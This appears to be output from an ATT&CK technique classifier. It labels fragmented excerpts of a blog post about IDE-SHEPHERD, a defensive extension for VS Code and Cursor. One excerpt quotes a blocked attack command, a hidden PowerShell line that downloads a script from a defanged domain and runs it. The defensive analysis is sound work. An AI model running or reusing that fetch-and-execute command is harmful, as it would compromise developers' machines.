“##e-shepherd events into their log explorers real-world attack prevention: two case studies let's examine how ide-shepherd defends against actual attack patterns observed in the wild. case study 1: blocking malicious process execution in this attack scenario, a compromi…”
T1176.002 IDE Extensions
94%
“” campaign, a .vscode/tasks.json file auto-ran malicious scripts as soon as a workspace was trusted, underscoring how easily attackers can exploit both extension-based and workspace-based weaknesses in vs code’s permissive trust model. meet ide-shepherd: real-time…”
T1176.002 IDE Extensions
91%
“introducing ide-shepherd: your shield against threat actors lurking in your ide in recent years, integrated development environments (ides) have become a pivotal component in modern software development, providing essential tools for writing, testing, and debugging code. amo…”
T1176.002 IDE Extensions
90%
“##ed renderer process. extensions run in a separate extension host process that, as per the official documentation, provides a scalable solution with full node.js support. this design grants the extension host unrestricted access to ide apis, workspace settings, and host files. …”
T1176.002 IDE Extensions
82%
“= { 'activate': activate, 'deactivate': deactivate }; ide-shepherd's child_process patch intercepts the exec() call before execution and checks its argument against the integrated rules set. the process-analyzer detects the powershell activity and identifies its …”
T1059.001 PowerShell
74%
“process plugin: blocked exec(): powershell -windowstyle hidden -command "irm https://niggboo[.]com/aaa | iex" case study 2: preventing "contagious interview" task execution in this second case, we take a closer look at a novel ttp used as part of the "contagi…”
T1176.002 IDE Extensions
72%
“##card activations, and signs of obfuscation. 1. run-time defense the monitoring system operates at the node.js layer, instrumenting critical apis to detect and prevent malicious operations: 2. heuristic detection the scanner performs deep metadata analysis of installed exten…”
T1204.002 Malicious File
64%
“code execution through jupyter notebook files (cve-2022-41034) and malicious git repositories (cve-2020-27955). importantly, microsoft does operate a marketplace vetting process that reviews extensions for security issues prior to publication and verifies publishers. …”
T1176.002 IDE Extensions
48%
“cursor, which assign trust to a publisher and then extend that trust to all of the publisher’s extensions, ide-shepherd reviews each extension’s behavior at runtime. this offers the users granular control over individual plugins and reduces the risk of compromised extension…”
T1059.001 PowerShell
43%
“= { 'activate': activate, 'deactivate': deactivate }; ide-shepherd's child_process patch intercepts the exec() call before execution and checks its argument against the integrated rules set. the process-analyzer detects the powershell activity and identifies its …”
T1176 Software Extensions
33%
“##ed renderer process. extensions run in a separate extension host process that, as per the official documentation, provides a scalable solution with full node.js support. this design grants the extension host unrestricted access to ide apis, workspace settings, and host files. …”
Summary
IDE-SHEPHERD is an open-source IDE security extension that provides real-time monitoring and protection for VS Code and Cursor. It intercepts malicious process executions, monitors network activity, and blocks dangerous workspace tasks before they can compromise your development environment.